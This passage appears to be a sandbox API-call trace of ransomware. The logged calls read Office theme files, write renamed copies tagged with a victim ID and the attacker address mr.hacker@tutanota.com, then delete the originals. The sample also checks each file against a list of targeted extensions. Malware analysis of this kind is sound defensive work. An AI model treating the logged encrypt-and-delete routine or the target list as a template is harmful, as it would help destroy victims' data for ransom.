returned 4 [0271.303] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.303] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.303] lstrlenW (lpString="Slipstream.eftx") returned 15 [0271.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.304] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=27789) returned 1 [0271.304] CloseHandle (hObject=0x3a8) returned 1 [0271.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx")) returned 0x20 [0271.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.304] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.304] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.306] GetLastError () returned 0x0 [0271.306] ReadFile (in: hFile=0x3a8, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x6c8d, lpOverlapped=0x0) returned 1 [0271.312] WriteFile (in: hFile=0x398, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x6c90, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x3a8, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.313] WriteFile (in: hFile=0x398, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0271.313] SetEndOfFile (hFile=0x398) returned 1 [0271.313] CloseHandle (hObject=0x398) returned 1 [0271.314] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.314] SetEndOfFile (hFile=0x3a8) returned 1 [0271.316] CloseHandle (hObject=0x3a8) returned 1 [0271.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.316] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx")) returned 1 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.316] lstrlenW (lpString=".doc") returned 4 [0271.316] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.316] lstrlenW (lpString=".docx") returned 5 [0271.316] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.316] lstrlenW (lpString=".pdf") returned 4 [0271.316] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString=".xls") returned 4 [0271.317] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString=".xlsx") returned 5 [0271.317] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.317] lstrlenW (lpString=".ppt") returned 4 [0271.317] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.317] lstrlenW (lpString=".zip") returned 4 [0271.317] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString=".rar") returned 4 [0271.317] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString=".bz2") returned 4 [0271.317] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString=".7z") returned 3 [0271.317] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.317] lstrlenW (lpString=".dbf") returned 4 [0271.317] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.317] lstrlenW (lpString=".1cd") returned 4 [0271.317] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.317] lstrlenW (lpString=".jpg") returned 4 [0271.317] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.317] lstrlenW (lpString=".doc") returned 4 [0271.317] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.317] lstrlenW (lpString=".docx") returned 5 [0271.318] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.318] lstrlenW (lpString=".pdf") returned 4 [0271.318] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString=".xls") returned 4 [0271.318] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString=".xlsx") returned 5 [0271.318] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.318] lstrlenW (lpString=".ppt") returned 4 [0271.318] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.318] lstrlenW (lpString=".zip") returned 4 [0271.318] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString=".rar") returned 4 [0271.318] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString=".bz2") returned 4 [0271.318] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString=".7z") returned 3 [0271.318] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.318] lstrlenW (lpString=".dbf") returned 4 [0271.318] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.318] lstrlenW (lpString=".1cd") returned 4 [0271.318] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0271.318] lstrlenW (lpString=".jpg") returned 4 [0271.318] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.319] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.319] lstrlenW (lpString="Solstice.eftx") returned 13 [0271.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.328] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=27781) returned 1 [0271.328] CloseHandle (hObject=0x3a8) returned 1 [0271.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx")) returned 0x20 [0271.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.328] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.328] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.331] GetLastError () returned 0x0 [0271.331] ReadFile (in: hFile=0x3a8, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x6c85, lpOverlapped=0x0) returned 1 [0271.341] WriteFile (in: hFile=0x388, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x6c90, lpOverlapped=0x0) returned 1 [0271.342] ReadFile (in: hFile=0x3a8, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.343] WriteFile (in: hFile=0x388, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xee, lpOverlapped=0x0) returned 1 [0271.343] SetEndOfFile (hFile=0x388) returned 1 [0271.343] CloseHandle (hObject=0x388) returned 1 [0271.343] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.343] SetEndOfFile (hFile=0x3a8) returned 1 [0271.350] CloseHandle (hObject=0x3a8) returned 1 [0271.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.350] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx")) returned 1 [0271.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.351] lstrlenW (lpString=".doc") returned 4 [0271.351] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString=".docx") returned 5 [0271.351] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.351] lstrlenW (lpString=".pdf") returned 4 [0271.351] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString=".xls") returned 4 [0271.351] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString=".xlsx") returned 5 [0271.351] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.351] lstrlenW (lpString=".ppt") returned 4 [0271.351] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.351] lstrlenW (lpString=".zip") returned 4 [0271.351] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString=".rar") returned 4 [0271.351] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString=".bz2") returned 4 [0271.351] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString=".7z") returned 3 [0271.351] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.351] lstrlenW (lpString=".dbf") returned 4 [0271.351] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.351] lstrlenW (lpString=".1cd") returned 4 [0271.351] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.351] lstrlenW (lpString=".jpg") returned 4 [0271.351] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.352] lstrlenW (lpString=".doc") returned 4 [0271.352] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString=".docx") returned 5 [0271.352] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.352] lstrlenW (lpString=".pdf") returned 4 [0271.352] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString=".xls") returned 4 [0271.352] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString=".xlsx") returned 5 [0271.352] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.352] lstrlenW (lpString=".ppt") returned 4 [0271.352] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.352] lstrlenW (lpString=".zip") returned 4 [0271.352] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString=".rar") returned 4 [0271.352] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString=".bz2") returned 4 [0271.352] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString=".7z") returned 3 [0271.352] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.352] lstrlenW (lpString=".dbf") returned 4 [0271.352] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.352] lstrlenW (lpString=".1cd") returned 4 [0271.352] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0271.353] lstrlenW (lpString=".jpg") returned 4 [0271.353] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.353] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.353] lstrlenW (lpString="Technic.eftx") returned 12 [0271.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.907] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=23692) returned 1 [0271.907] CloseHandle (hObject=0x3ac) returned 1 [0271.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx")) returned 0x20 [0271.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0271.920] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.920] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.920] GetLastError () returned 0x0 [0271.920] ReadFile (in: hFile=0x2bc, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x5c8c, lpOverlapped=0x0) returned 1 [0271.929] WriteFile (in: hFile=0x388, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x5c90, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x5c90, lpOverlapped=0x0) returned 1 [0271.931] ReadFile (in: hFile=0x2bc, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.931] WriteFile (in: hFile=0x388, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.931] SetEndOfFile (hFile=0x388) returned 1 [0271.938] CloseHandle (hObject=0x388) returned 1 [0271.938] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.938] SetEndOfFile (hFile=0x2bc) returned 1 [0271.946] CloseHandle (hObject=0x2bc) returned 1 [0271.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.970] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx")) returned 1 [0271.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.970] lstrlenW (lpString=".doc") returned 4 [0271.970] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.970] lstrlenW (lpString=".docx") returned 5 [0271.970] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.971] lstrlenW (lpString=".pdf") returned 4 [0271.971] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString=".xls") returned 4 [0271.971] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString=".xlsx") returned 5 [0271.971] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.971] lstrlenW (lpString=".ppt") returned 4 [0271.971] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.971] lstrlenW (lpString=".zip") returned 4 [0271.971] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString=".rar") returned 4 [0271.971] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString=".bz2") returned 4 [0271.971] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString=".7z") returned 3 [0271.971] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.971] lstrlenW (lpString=".dbf") returned 4 [0271.971] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.971] lstrlenW (lpString=".1cd") returned 4 [0271.971] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.971] lstrlenW (lpString=".jpg") returned 4 [0271.971] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.971] lstrlenW (lpString=".doc") returned 4 [0271.971] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.971] lstrlenW (lpString=".docx") returned 5 [0271.972] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.972] lstrlenW (lpString=".pdf") returned 4 [0271.972] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString=".xls") returned 4 [0271.972] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString=".xlsx") returned 5 [0271.972] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.972] lstrlenW (lpString=".ppt") returned 4 [0271.972] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.972] lstrlenW (lpString=".zip") returned 4 [0271.972] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString=".rar") returned 4 [0271.972] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString=".bz2") returned 4 [0271.972] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString=".7z") returned 3 [0271.972] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.972] lstrlenW (lpString=".dbf") returned 4 [0271.972] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.972] lstrlenW (lpString=".1cd") returned 4 [0271.972] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79 [0271.972] lstrlenW (lpString=".jpg") returned 4 [0271.972] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.972] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0271.973] lstrlenW (lpString="OFFICE10.DLL") returned 12 [0271.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.132] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x3a8ff1c | out: 